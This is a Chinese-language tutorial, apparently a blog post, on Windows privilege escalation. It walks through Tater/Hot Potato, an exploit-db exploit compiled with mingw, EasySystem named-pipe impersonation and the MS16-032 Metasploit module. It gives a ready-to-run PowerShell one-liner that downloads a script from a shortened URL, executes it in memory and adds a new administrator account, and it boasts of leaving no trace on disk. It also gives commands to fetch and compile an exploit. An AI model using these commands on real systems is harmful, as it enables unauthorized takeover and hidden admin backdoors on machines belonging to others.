使用 Tater、Sploits提升权限

使用 Tater 提升权限

windows terminal 高级使用(使用TaterSploits)(1)

使用 PowerShell 版本的 Hot Potato - Tater,它会立即加载到内存中并且不会在磁盘上留下任何痕迹!你可以在一行中运行该实用程序:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/fVC1Yd'); Invoke-Tater -Trigger Command ""net user User1 Password1 /add && net localgroup administrators User1 /add"""

之后,用户 User1 将出现在系统中,密码为 Password1,它是 Administrators 组的成员。但需要注意的是,对于 Windows 10,应该使用 -Trigger 2 开关。

在 Kali 中编译Sploits

windows terminal 高级使用(使用TaterSploits)(2)

毫无疑问,用于渗透测试/黑客攻击的主要操作系统是Linux,为它实现了一堆工具,通常很少有人在Windows下破解。默认情况下一切都很好,直到你需要在 Windows 下编译sploit(在我们的例子中,以提高权限)。通过安装 Mingw-w64 解决了这个缺陷:

apt-get update

apt-get install mingw-w64

然后一切都很简单,下载sploit并编译:

wget‐‐output-document= 40564.c https://www.exploit-db.com/download/40564

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32

如果你已经有本地管理员并且唯一的问题是如何访问系统,那么你可以查看小的EasySystem实用程序。正如该实用程序的作者所写,这不是一个漏洞利用,而是一个模拟命名管道的“古老而肮脏”的技巧。

windows terminal 高级使用(使用TaterSploits)(3)

Windows 权限提升。EasySystem 和命名管道授予 NT AUTHORITY\SYSTEM

在某些情况下,这样的工具可以派上用场。我们不会详述技术细节,如果你有兴趣,可以在此处和此处阅读有关此技术的更多信息。

辅助登录句柄

另一个有趣的技巧涉及使用辅助登录服务。此服务允许你以管理员身份运行程序、Microsoft 管理控制台、控制面板项目,即使当前用户仅属于 Users 或 Power Users 组。底线是该服务在创建新进程时不会清除句柄。

windows terminal 高级使用(使用TaterSploits)(4)

对我们来说重要的是几乎所有版本的 Windows(x32 和 x64)都受到此漏洞的影响:从 Vista 到 Windows 2012 Server。但是有一些限制:要成功提升权限,必须在系统上安装 PowerShell 2.0 或更高版本,并且必须存在两个或更多 CPU 内核。Metasploit框架有一个特殊的模块exploit/windows/local/ms16_032_secondary_logon_handle_privesc。

它的使用意味着我们已经有一个meterpreter会话,我们必须在参数中指定它:设置会话1。好吧,如果操作成功,我们将拥有另一个具有提升权限的会话。

对于相同的漏洞,还有一个PowerShell 脚本可以启动具有系统权限的命令 shell。以及执行相同操作的已编译二进制文件。
顺便说一句,微软发布了一个补丁,所以在尝试提升权限之前,请检查它是否已安装:

C:\Users\pentestlab>wmic qfe list | find "3139914"

,